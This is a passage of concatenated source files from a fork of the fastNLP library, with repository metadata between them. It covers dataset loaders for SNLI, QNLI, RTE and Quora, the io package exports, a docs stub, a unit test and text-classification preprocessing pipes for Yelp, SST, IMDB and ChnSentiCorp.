csv-table:: The fields of a DataSet loaded with SNLILoader\n        :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n        \"The new rights are...\", \"Everyone really likes..\", \"neutral\"\n        \"This site includes a...\", \"The Government Executive...\", \"entailment\"\n        \"...\", \"...\", \".\"\n\n    \"\"\"\n    \n    def __init__(self):\n        super().__init__(fields={\n            'sentence1': Const.RAW_WORDS(0),\n            'sentence2': Const.RAW_WORDS(1),\n            'gold_label': Const.TARGET,\n        })\n    \n    def load(self, paths: Union[str, Dict[str, str]] = None) -> DataBundle:\n        \"\"\"\n        Reads data from the file(s) at one or more given paths and returns a :class:`~fastNLP.io.DataBundle`.\n\n        The fields that are read are determined by the headers passed to ConllLoader at initialization.\n\n        :param str paths: a directory in which the three files snli_1.0_train.jsonl, snli_1.0_dev.jsonl\n            and snli_1.0_test.jsonl are looked up.\n\n        :return: the resulting :class:`~fastNLP.io.DataBundle`\n        \"\"\"\n        _paths = {}\n        if paths is None:\n            paths = self.download()\n        if paths:\n            if os.path.isdir(paths):\n                if not os.path.isfile(os.path.join(paths, 'snli_1.0_train.jsonl')):\n                    raise FileNotFoundError(f\"snli_1.0_train.jsonl is not found in {paths}\")\n                _paths['train'] = os.path.join(paths, 'snli_1.0_train.jsonl')\n                for filename in ['snli_1.0_dev.jsonl', 'snli_1.0_test.jsonl']:\n                    filepath = os.path.join(paths, filename)\n                    _paths[filename.split('_')[-1].split('.')[0]] = filepath\n                paths = _paths\n            else:\n                raise NotADirectoryError(f\"{paths} is not a valid directory.\")\n        \n        datasets = {name: self._load(path) for name, path in paths.items()}\n        data_bundle = DataBundle(datasets=datasets)\n        return data_bundle\n    \n    def download(self):\n        \"\"\"\n        If your paper uses this data, please cite\n\n        http://nlp.stanford.edu/pubs/snli_paper.pdf\n\n        :return: str\n        \"\"\"\n        return self._get_dataset_path('snli')\n\n\nclass QNLILoader(JsonLoader):\n    \"\"\"\n    Loader for the QNLI dataset.\n    The loaded DataSet has the following fields: raw_words1 is the question, raw_words2 is the sentence, and target\n    is the label\n\n    .. csv-table::\n        :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n        \"What came into force after the new...\", \"As of that day...\", \"entailment\"\n        \"What is the first major...\", \"The most important tributaries\", \"not_entailment\"\n        \"...\",\".\"\n\n    The test set has no target column.\n\n    \"\"\"\n    \n    def __init__(self):\n        super().__init__()\n    \n    def _load(self, path):\n        ds = DataSet()\n        \n        with open(path, 'r', encoding='utf-8') as f:\n            f.readline()  # skip the header\n            if path.endswith(\"test.tsv\"):\n                warnings.warn(\"QNLI's test file has no target.\")\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        parts = line.split('\\t')\n                        raw_words1 = parts[1]\n                        raw_words2 = parts[2]\n                        if raw_words1 and raw_words2:\n                            ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n            else:\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        parts = line.split('\\t')\n                        raw_words1 = parts[1]\n                        raw_words2 = parts[2]\n                        target = parts[-1]\n                        if raw_words1 and raw_words2 and target:\n                            ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n        return ds\n    \n    def download(self):\n        \"\"\"\n        If your experiments use this data, please cite\n\n        .. todo::\n            to be added\n\n        :return:\n        \"\"\"\n        return self._get_dataset_path('qnli')\n\n\nclass RTELoader(Loader):\n    \"\"\"\n    Loader for the RTE data.\n    The loaded DataSet has the following fields: raw_words1 is sentence0, raw_words2 is sentence1, and target is the\n    label\n\n    .. 
csv-table::\n        :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n        \"Dana Reeve, the widow of the actor...\", \"Christopher Reeve had an...\", \"not_entailment\"\n        \"Yet, we now are discovering that...\", \"Bacteria is winning...\", \"entailment\"\n        \"...\",\".\"\n\n    The test set has no target column.\n    \"\"\"\n    \n    def __init__(self):\n        super().__init__()\n    \n    def _load(self, path: str):\n        ds = DataSet()\n        \n        with open(path, 'r', encoding='utf-8') as f:\n            f.readline()  # skip the header\n            if path.endswith(\"test.tsv\"):\n                warnings.warn(\"RTE's test file has no target.\")\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        parts = line.split('\\t')\n                        raw_words1 = parts[1]\n                        raw_words2 = parts[2]\n                        if raw_words1 and raw_words2:\n                            ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2))\n            else:\n                for line in f:\n                    line = line.strip()\n                    if line:\n                        parts = line.split('\\t')\n                        raw_words1 = parts[1]\n                        raw_words2 = parts[2]\n                        target = parts[-1]\n                        if raw_words1 and raw_words2 and target:\n                            ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n        return ds\n    \n    def download(self):\n        return self._get_dataset_path('rte')\n\n\nclass QuoraLoader(Loader):\n    \"\"\"\n    Loader for the Quora matching task dataset\n\n    The files to be read should have the following form: tab-separated, and the content of the first three columns\n    must be: the first column is the label, and the second and third columns are the sentences\n\n    Example::\n\n        1\tHow do I get funding for my web based startup idea ?\tHow do I get seed funding pre product ?\t327970\n        1\tHow can I stop my depression ?\tWhat can I do to stop being depressed ?\t339556\n        ...\n\n    The loaded DataSet has the following fields\n\n    .. csv-table::\n        :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n        \"What should I do to avoid...\", \"1\"\n        \"How do I not sleep in a boring class...\", \"0\"\n        \"...\",\".\"\n\n    \"\"\"\n    \n    def __init__(self):\n        super().__init__()\n    \n    def _load(self, path: str):\n        ds = DataSet()\n        \n        with open(path, 'r', encoding='utf-8') as f:\n            for line in f:\n                line = line.strip()\n                if line:\n                    parts = line.split('\\t')\n                    raw_words1 = parts[1]\n                    raw_words2 = parts[2]\n                    target = parts[0]\n                    if raw_words1 and raw_words2 and target:\n                        ds.append(Instance(raw_words1=raw_words1, raw_words2=raw_words2, target=target))\n        return ds\n    \n    def download(self):\n        raise RuntimeError(\"Quora cannot be downloaded automatically.\")\n" }, { "alpha_fraction": 0.6082345843315125, "alphanum_fraction": 0.62195885181427, "avg_line_length": 16.06382942199707, "blob_id": "03f35198b98a66ccf76f4f0210623c07e4431934", "content_id": "c8b3dfaac7e7ef52d31e916166944029b065d3cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1727, "license_type": "permissive", "max_line_length": 67, "num_lines": 94, "path": "/fastNLP/io/__init__.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"\nModules for IO, specifically including:\n\n1. the :doc:`EmbedLoader <fastNLP.io.embed_loader>` class for reading in embeddings,\n\n2. the :doc:`Loader <fastNLP.io.loader>` classes for reading data in different formats\n\n3. the :doc:`Pipe <fastNLP.io.pipe>` classes for processing the data that was read\n\n4. 
the classes for saving and loading models; see the :doc:`model_io documentation</fastNLP.io.model_io>`\n\nThese classes are used as follows:\n\"\"\"\n__all__ = [\n    'DataBundle',\n    \n    'EmbedLoader',\n    \n    'Loader',\n    \n    'YelpLoader',\n    'YelpFullLoader',\n    'YelpPolarityLoader',\n    'IMDBLoader',\n    'SSTLoader',\n    'SST2Loader',\n    \"ChnSentiCorpLoader\",\n\n    'ConllLoader',\n    'Conll2003Loader',\n    'Conll2003NERLoader',\n    'OntoNotesNERLoader',\n    'CTBLoader',\n    \"MsraNERLoader\",\n    \"WeiboNERLoader\",\n    \"PeopleDailyNERLoader\",\n\n    'CSVLoader',\n    'JsonLoader',\n\n    'CWSLoader',\n\n    'MNLILoader',\n    \"QuoraLoader\",\n    \"SNLILoader\",\n    \"QNLILoader\",\n    \"RTELoader\",\n\n    \"Pipe\",\n\n    \"YelpFullPipe\",\n    \"YelpPolarityPipe\",\n    \"SSTPipe\",\n    \"SST2Pipe\",\n    \"IMDBPipe\",\n    \"ChnSentiCorpPipe\",\n\n    \"Conll2003Pipe\",\n    \"Conll2003NERPipe\",\n    \"OntoNotesNERPipe\",\n    \"MsraNERPipe\",\n    \"PeopleDailyPipe\",\n    \"WeiboNERPipe\",\n\n    \"CWSPipe\",\n\n    \"MatchingBertPipe\",\n    \"RTEBertPipe\",\n    \"SNLIBertPipe\",\n    \"QuoraBertPipe\",\n    \"QNLIBertPipe\",\n    \"MNLIBertPipe\",\n    \"MatchingPipe\",\n    \"RTEPipe\",\n    \"SNLIPipe\",\n    \"QuoraPipe\",\n    \"QNLIPipe\",\n    \"MNLIPipe\",\n\n    'ModelLoader',\n    'ModelSaver',\n\n]\n\nfrom .embed_loader import EmbedLoader\nfrom .data_bundle import DataBundle\nfrom .model_io import ModelLoader, ModelSaver\n\nfrom .loader import *\nfrom .pipe import *\n\nimport sys\nfrom ..doc_utils import doc_process\ndoc_process(sys.modules[__name__])" }, { "alpha_fraction": 0.766968309879303, "alphanum_fraction": 0.7873303294181824, "avg_line_length": 72.5, "blob_id": "a74ef409d3e89df60e10df8873a24ce417b5dcfe", "content_id": "3ef9b5a809cacc2d73cacd6f91832325ac9f3b01", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 442, "license_type": "permissive", "max_line_length": 352, "num_lines": 6, "path": "/docs/source/fastNLP.io.pipe.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "fastNLP.io.pipe\n===============\n\n.. 
automodule:: fastNLP.io.pipe\n :members: Pipe, CWSPipe, YelpFullPipe, YelpPolarityPipe, SSTPipe, SST2Pipe, IMDBPipe, ChnSentiCorpPipe, Conll2003NERPipe, OntoNotesNERPipe, MsraNERPipe, WeiboNERPipe, PeopleDailyPipe, Conll2003Pipe, MatchingBertPipe, RTEBertPipe, SNLIBertPipe, QuoraBertPipe, QNLIBertPipe, MNLIBertPipe, MatchingPipe, RTEPipe, SNLIPipe, QuoraPipe, QNLIPipe, MNLIPipe\n :inherited-members:\n\n" }, { "alpha_fraction": 0.5475024580955505, "alphanum_fraction": 0.5577864646911621, "avg_line_length": 34.98181915283203, "blob_id": "1e5206dae38917589d0156866f4fe2f556261abf", "content_id": "1ae3089c9597cfd4dc5b30e19bd0b44c2f82449f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "permissive", "max_line_length": 80, "num_lines": 55, "path": "/test/io/pipe/test_extcnndm.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# __author__=\"Danqing Wang\"\r\n\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\n\r\nimport unittest\r\nimport os\r\n# import sys\r\n#\r\n# sys.path.append(\"../../../\")\r\n\r\nfrom fastNLP.io import DataBundle\r\nfrom fastNLP.io.pipe.summarization import ExtCNNDMPipe\r\n\r\nclass TestRunExtCNNDMPipe(unittest.TestCase):\r\n\r\n def test_load(self):\r\n data_set_dict = {\r\n 'CNNDM': {\"train\": 'test/data_for_tests/cnndm.jsonl'},\r\n }\r\n vocab_size = 100000\r\n VOCAL_FILE = 'test/data_for_tests/cnndm.vocab'\r\n sent_max_len = 100\r\n doc_max_timesteps = 50\r\n dbPipe = ExtCNNDMPipe(vocab_size=vocab_size,\r\n vocab_path=VOCAL_FILE,\r\n sent_max_len=sent_max_len,\r\n doc_max_timesteps=doc_max_timesteps)\r\n dbPipe2 = ExtCNNDMPipe(vocab_size=vocab_size,\r\n vocab_path=VOCAL_FILE,\r\n sent_max_len=sent_max_len,\r\n doc_max_timesteps=doc_max_timesteps,\r\n domain=True)\r\n for k, v in data_set_dict.items():\r\n db = dbPipe.process_from_file(v)\r\n db2 = dbPipe2.process_from_file(v)\r\n\r\n # print(db2.get_dataset(\"train\"))\r\n\r\n self.assertTrue(isinstance(db, DataBundle))\r\n self.assertTrue(isinstance(db2, DataBundle))\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5386495590209961, "alphanum_fraction": 0.5523983836174011, "avg_line_length": 32.68610763549805, "blob_id": "538151711914c1d7691297db8e965839f0ae3b08", "content_id": "b1d150aa5f03e356b999c0d7a3abebd3ed542232", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21680, "license_type": "permissive", "max_line_length": 116, "num_lines": 583, "path": "/fastNLP/io/pipe/classification.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"YelpFullPipe\",\n \"YelpPolarityPipe\",\n \"SSTPipe\",\n \"SST2Pipe\",\n 'IMDBPipe',\n \"ChnSentiCorpPipe\"\n]\n\nimport re\nimport warnings\n\nfrom nltk import Tree\n\nfrom .pipe 
import Pipe\nfrom .utils import get_tokenizer, _indexize, _add_words_field, _drop_empty_instance, _add_chars_field\nfrom ..data_bundle import DataBundle\nfrom ..loader.classification import ChnSentiCorpLoader\nfrom ..loader.classification import IMDBLoader, YelpFullLoader, SSTLoader, SST2Loader, YelpPolarityLoader\nfrom ...core.const import Const\nfrom ...core.dataset import DataSet\nfrom ...core.instance import Instance\nfrom ...core.vocabulary import Vocabulary\nfrom ...core._logger import logger\n\nnonalpnum = re.compile('[^0-9a-zA-Z?!\\']+')\n\n\nclass _CLSPipe(Pipe):\n \"\"\"\n 分类问题的基类,负责对classification的数据进行tokenize操作。默认是对raw_words列操作,然后生成words列\n\n \"\"\"\n \n def __init__(self, tokenizer: str = 'spacy', lang='en'):\n \n self.tokenizer = get_tokenizer(tokenizer, lang=lang)\n \n def _tokenize(self, data_bundle, field_name=Const.INPUT, new_field_name=None):\n \"\"\"\n 将DataBundle中的数据进行tokenize\n\n :param DataBundle data_bundle:\n :param str field_name:\n :param str new_field_name:\n :return: 传入的DataBundle对象\n \"\"\"\n new_field_name = new_field_name or field_name\n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(self.tokenizer, field_name=field_name, new_field_name=new_field_name)\n \n return data_bundle\n \n def _granularize(self, data_bundle, tag_map):\n \"\"\"\n 该函数对data_bundle中'target'列中的内容进行转换。\n\n :param data_bundle:\n :param dict tag_map: 将target列中的tag做以下的映射,比如{\"0\":0, \"1\":0, \"3\":1, \"4\":1}, 则会删除target为\"2\"的instance,\n 且将\"1\"认为是第0类。\n :return: 传入的data_bundle\n \"\"\"\n for name in list(data_bundle.datasets.keys()):\n dataset = data_bundle.get_dataset(name)\n dataset.apply_field(lambda target: tag_map.get(target, -100), field_name=Const.TARGET,\n new_field_name=Const.TARGET)\n dataset.drop(lambda ins: ins[Const.TARGET] == -100)\n data_bundle.set_dataset(dataset, name)\n return data_bundle\n\n\ndef _clean_str(words):\n \"\"\"\n heavily borrowed from github\n https://github.com/LukeZhuang/Hierarchical-Attention-Network/blob/master/yelp-preprocess.ipynb\n :param sentence: is a str\n :return:\n \"\"\"\n words_collection = []\n for word in words:\n if word in ['-lrb-', '-rrb-', '<sssss>', '-r', '-l', 'b-']:\n continue\n tt = nonalpnum.split(word)\n t = ''.join(tt)\n if t != '':\n words_collection.append(t)\n \n return words_collection\n\n\nclass YelpFullPipe(_CLSPipe):\n \"\"\"\n 处理YelpFull的数据, 处理之后DataSet中的内容如下\n\n .. 
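The `_granularize` helper above rewrites every value in the target column through a tag_map and then drops the instances whose label is absent from the map (they are first rewritten to -100). A minimal sketch of that behavior in plain Python, using toy labels rather than a real DataSet::

    tag_map = {"1": 0, "2": 0, "4": 1, "5": 1}   # granularity=2: "3" has no entry and is dropped
    targets = ["1", "3", "5", "2"]
    mapped = [tag_map.get(t, -100) for t in targets]   # [0, -100, 1, 0]
    kept = [m for m in mapped if m != -100]            # [0, 1, 0]
    print(mapped, kept)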
csv-table:: 下面是使用YelpFullPipe处理后的DataSet所具备的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 10\n \"Offers that ...\", \"[20, 40, ...]\", 1, 21\n \"...\", \"[...]\", ., .\n\n \"\"\"\n \n def __init__(self, lower: bool = False, granularity=5, tokenizer: str = 'spacy'):\n \"\"\"\n \n :param bool lower: 是否对输入进行小写化。\n :param int granularity: 支持2, 3, 5。若为2, 则认为是2分类问题,将1、2归为1类,4、5归为一类,丢掉2;若为3, 则有3分类问题,将\n 1、2归为1类,3归为1类,4、5归为1类;若为5, 则有5分类问题。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n assert granularity in (2, 3, 5), \"granularity can only be 2,3,5.\"\n self.granularity = granularity\n \n if granularity == 2:\n self.tag_map = {\"1\": 0, \"2\": 0, \"4\": 1, \"5\": 1}\n elif granularity == 3:\n self.tag_map = {\"1\": 0, \"2\": 0, \"3\": 1, \"4\": 2, \"5\": 2}\n else:\n self.tag_map = {\"1\": 0, \"2\": 1, \"3\": 2, \"4\": 3, \"5\": 4}\n \n def _tokenize(self, data_bundle, field_name=Const.INPUT, new_field_name=None):\n \"\"\"\n 将DataBundle中的数据进行tokenize\n\n :param DataBundle data_bundle:\n :param str field_name:\n :param str new_field_name:\n :return: 传入的DataBundle对象\n \"\"\"\n new_field_name = new_field_name or field_name\n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(self.tokenizer, field_name=field_name, new_field_name=new_field_name)\n dataset.apply_field(_clean_str, field_name=field_name, new_field_name=new_field_name)\n return data_bundle\n \n def process(self, data_bundle):\n \"\"\"\n 传入的DataSet应该具备如下的结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"I got 'new' tires from them and... \", \"1\"\n \"Don't waste your time. We had two...\", \"1\"\n \"...\", \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n \n # 复制一列words\n data_bundle = _add_words_field(data_bundle, lower=self.lower)\n \n # 进行tokenize\n data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n \n # 根据granularity设置tag\n data_bundle = self._granularize(data_bundle, tag_map=self.tag_map)\n \n # 删除空行\n data_bundle = _drop_empty_instance(data_bundle, field_name=Const.INPUT)\n \n # index\n data_bundle = _indexize(data_bundle=data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths:\n :return: DataBundle\n \"\"\"\n data_bundle = YelpFullLoader().load(paths)\n return self.process(data_bundle=data_bundle)\n\n\nclass YelpPolarityPipe(_CLSPipe):\n \"\"\"\n 处理YelpPolarity的数据, 处理之后DataSet中的内容如下\n\n .. 
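The steps above (copy the words field, tokenize, granularize, drop empty rows, index, add seq_len) are driven end to end by process_from_file. A minimal usage sketch; the data path is hypothetical and process_from_file accepts the same path types as the corresponding loader::

    from fastNLP.io import YelpFullPipe

    pipe = YelpFullPipe(lower=True, granularity=2, tokenizer='raw')
    data_bundle = pipe.process_from_file('path/to/yelp_review_full')  # hypothetical local path
    print(data_bundle)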
csv-table:: 下面是使用YelpPolarityPipe处理后的DataSet所具备的field\n        :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n        \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 10\n        \"Offers that ...\", \"[20, 40, ...]\", 1, 21\n        \"...\", \"[...]\", ., .\n\n    \"\"\"\n    \n    def __init__(self, lower: bool = False, tokenizer: str = 'spacy'):\n        \"\"\"\n        \n        :param bool lower: 是否对输入进行小写化。\n        :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n        \"\"\"\n        super().__init__(tokenizer=tokenizer, lang='en')\n        self.lower = lower\n    \n    def process(self, data_bundle):\n        # 复制一列words\n        data_bundle = _add_words_field(data_bundle, lower=self.lower)\n        \n        # 进行tokenize\n        data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n        # index\n        data_bundle = _indexize(data_bundle=data_bundle)\n        \n        for name, dataset in data_bundle.datasets.items():\n            dataset.add_seq_len(Const.INPUT)\n        \n        data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n        data_bundle.set_target(Const.TARGET)\n        \n        return data_bundle\n    \n    def process_from_file(self, paths=None):\n        \"\"\"\n\n        :param str paths:\n        :return: DataBundle\n        \"\"\"\n        data_bundle = YelpPolarityLoader().load(paths)\n        return self.process(data_bundle=data_bundle)\n\n\nclass SSTPipe(_CLSPipe):\n    \"\"\"\n    经过该Pipe之后,DataSet中具备的field如下所示\n\n    .. csv-table:: 下面是使用SSTPipe处理后的DataSet所具备的field\n       :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n       \"It 's a ...\", \"[4, 2, 10, ...]\", 0, 16\n       \"Offers that ...\", \"[20, 40, ...]\", 1, 18\n       \"...\", \"[...]\", ., .\n\n    \"\"\"\n    \n    def __init__(self, subtree=False, train_subtree=True, lower=False, granularity=5, tokenizer='spacy'):\n        \"\"\"\n        \n        :param bool subtree: 是否将train, test, dev数据展开为子树,扩充数据量。 Default: ``False``\n        :param bool train_subtree: 是否将train集通过子树扩展数据。\n        :param bool lower: 是否对输入进行小写化。\n        :param int granularity: 支持2, 3, 5。若为2, 则认为是2分类问题,将0、1归为1类,3、4归为一类,丢掉2;若为3, 则有3分类问题,将\n            0、1归为1类,2归为1类,3、4归为1类;若为5, 则有5分类问题。\n        :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n        \"\"\"\n        super().__init__(tokenizer=tokenizer, lang='en')\n        self.subtree = subtree\n        self.train_tree = train_subtree\n        self.lower = lower\n        assert granularity in (2, 3, 5), \"granularity can only be 2,3,5.\"\n        self.granularity = granularity\n        \n        if granularity == 2:\n            self.tag_map = {\"0\": 0, \"1\": 0, \"3\": 1, \"4\": 1}\n        elif granularity == 3:\n            self.tag_map = {\"0\": 0, \"1\": 0, \"2\": 1, \"3\": 2, \"4\": 2}\n        else:\n            self.tag_map = {\"0\": 0, \"1\": 1, \"2\": 2, \"3\": 3, \"4\": 4}\n    \n    def process(self, data_bundle: DataBundle):\n        \"\"\"\n        对DataBundle中的数据进行预处理。输入的DataSet应该至少拥有raw_words这一列,且内容类似于\n\n        .. 
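SSTPipe.process below expands each parse tree into one instance per subtree when subtree expansion is enabled, which multiplies the training data. A small sketch of that expansion with nltk on a toy tree::

    from nltk import Tree

    tree = Tree.fromstring("(3 (2 It) (4 (2 is) (3 good)))")
    for t in tree.subtrees():
        print(t.label(), " ".join(t.leaves()))
    # 3 It is good
    # 2 It
    # 4 is good
    # 2 is
    # 3 good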
csv-table::\n :header: \"raw_words\"\n\n \"(3 (2 It) (4 (4 (2 's) (4 (3 (2 a)...\"\n \"(4 (4 (2 Offers) (3 (3 (2 that) (3 (3 rare)...\"\n \"...\"\n\n :param ~fastNLP.io.DataBundle data_bundle: 需要处理的DataBundle对象\n :return:\n \"\"\"\n # 先取出subtree\n for name in list(data_bundle.datasets.keys()):\n dataset = data_bundle.get_dataset(name)\n ds = DataSet()\n use_subtree = self.subtree or (name == 'train' and self.train_tree)\n for ins in dataset:\n raw_words = ins['raw_words']\n tree = Tree.fromstring(raw_words)\n if use_subtree:\n for t in tree.subtrees():\n raw_words = \" \".join(t.leaves())\n instance = Instance(raw_words=raw_words, target=t.label())\n ds.append(instance)\n else:\n instance = Instance(raw_words=' '.join(tree.leaves()), target=tree.label())\n ds.append(instance)\n data_bundle.set_dataset(ds, name)\n \n _add_words_field(data_bundle, lower=self.lower)\n \n # 进行tokenize\n data_bundle = self._tokenize(data_bundle=data_bundle, field_name=Const.INPUT)\n \n # 根据granularity设置tag\n data_bundle = self._granularize(data_bundle, tag_map=self.tag_map)\n \n # index\n data_bundle = _indexize(data_bundle=data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n data_bundle = SSTLoader().load(paths)\n return self.process(data_bundle=data_bundle)\n\n\nclass SST2Pipe(_CLSPipe):\n \"\"\"\n 加载SST2的数据, 处理完成之后DataSet将拥有以下的field\n\n .. csv-table::\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"it 's a charming and... \", \"[3, 4, 5, 6, 7,...]\", 1, 43\n \"unflinchingly bleak and...\", \"[10, 11, 7,...]\", 1, 21\n \"...\", \"...\", ., .\n\n \"\"\"\n \n def __init__(self, lower=False, tokenizer='spacy'):\n \"\"\"\n \n :param bool lower: 是否对输入进行小写化。\n :param str tokenizer: 使用哪种tokenize方式将数据切成单词。支持'spacy'和'raw'。raw使用空格作为切分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n \n def process(self, data_bundle: DataBundle):\n \"\"\"\n 可以处理的DataSet应该具备如下的结构\n\n .. csv-table::\n :header: \"raw_words\", \"target\"\n\n \"it 's a charming and... 
\", 1\n \"unflinchingly bleak and...\", 1\n \"...\", \"...\"\n\n :param data_bundle:\n :return:\n \"\"\"\n _add_words_field(data_bundle, self.lower)\n \n data_bundle = self._tokenize(data_bundle=data_bundle)\n \n src_vocab = Vocabulary()\n src_vocab.from_dataset(data_bundle.datasets['train'], field_name=Const.INPUT,\n no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n name != 'train'])\n src_vocab.index_dataset(*data_bundle.datasets.values(), field_name=Const.INPUT)\n \n tgt_vocab = Vocabulary(unknown=None, padding=None)\n tgt_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n field_name=Const.TARGET,\n no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n if ('train' not in name) and (ds.has_field(Const.TARGET))]\n )\n if len(tgt_vocab._no_create_word) > 0:\n warn_msg = f\"There are {len(tgt_vocab._no_create_word)} target labels\" \\\n f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n f\"data set but not in train data set!.\"\n warnings.warn(warn_msg)\n logger.warn(warn_msg)\n datasets = []\n for name, dataset in data_bundle.datasets.items():\n if dataset.has_field(Const.TARGET):\n datasets.append(dataset)\n tgt_vocab.index_dataset(*datasets, field_name=Const.TARGET)\n \n data_bundle.set_vocab(src_vocab, Const.INPUT)\n data_bundle.set_vocab(tgt_vocab, Const.TARGET)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n \n data_bundle.set_input(Const.INPUT, Const.INPUT_LEN)\n data_bundle.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param str paths: 如果为None,则自动下载并缓存到fastNLP的缓存地址。\n :return: DataBundle\n \"\"\"\n data_bundle = SST2Loader().load(paths)\n return self.process(data_bundle)\n\n\nclass IMDBPipe(_CLSPipe):\n \"\"\"\n 经过本Pipe处理后DataSet将如下\n\n .. csv-table:: 输出DataSet的field\n :header: \"raw_words\", \"words\", \"target\", \"seq_len\"\n\n \"Bromwell High is a cartoon ... \", \"[3, 5, 6, 9, ...]\", 0, 20\n \"Story of a man who has ...\", \"[20, 43, 9, 10, ...]\", 1, 31\n \"...\", \"[...]\", ., .\n\n 其中raw_words为str类型,是原文; words是转换为index的输入; target是转换为index的目标值;\n words列被设置为input; target列被设置为target。\n\n \"\"\"\n \n def __init__(self, lower: bool = False, tokenizer: str = 'spacy'):\n \"\"\"\n \n :param bool lower: 是否将words列的数据小写。\n :param str tokenizer: 使用什么tokenizer来将句子切分为words. 支持spacy, raw两种。raw即使用空格拆分。\n \"\"\"\n super().__init__(tokenizer=tokenizer, lang='en')\n self.lower = lower\n \n def process(self, data_bundle: DataBundle):\n \"\"\"\n 期待的DataBunlde中输入的DataSet应该类似于如下,有两个field,raw_words和target,且均为str类型\n\n .. csv-table:: 输入DataSet的field\n :header: \"raw_words\", \"target\"\n\n \"Bromwell High is a cartoon ... 
\", \"pos\"\n \"Story of a man who has ...\", \"neg\"\n \"...\", \"...\"\n\n :param DataBunlde data_bundle: 传入的DataBundle中的DataSet必须包含raw_words和target两个field,且raw_words列应该为str,\n target列应该为str。\n :return: DataBundle\n \"\"\"\n \n # 替换<br />\n def replace_br(raw_words):\n raw_words = raw_words.replace(\"<br />\", ' ')\n return raw_words\n \n for name, dataset in data_bundle.datasets.items():\n dataset.apply_field(replace_br, field_name=Const.RAW_WORD, new_field_name=Const.RAW_WORD)\n \n _add_words_field(data_bundle, lower=self.lower)\n self._tokenize(data_bundle, field_name=Const.INPUT, new_field_name=Const.INPUT)\n _indexize(data_bundle)\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n dataset.set_input(Const.INPUT, Const.INPUT_LEN)\n dataset.set_target(Const.TARGET)\n \n return data_bundle\n \n def process_from_file(self, paths=None):\n \"\"\"\n\n :param paths: 支持路径类型参见 :class:`fastNLP.io.loader.Loader` 的load函数。\n :return: DataBundle\n \"\"\"\n # 读取数据\n data_bundle = IMDBLoader().load(paths)\n data_bundle = self.process(data_bundle)\n \n return data_bundle\n\n\nclass ChnSentiCorpPipe(Pipe):\n \"\"\"\n 处理之后的DataSet有以下的结构\n\n .. csv-table::\n 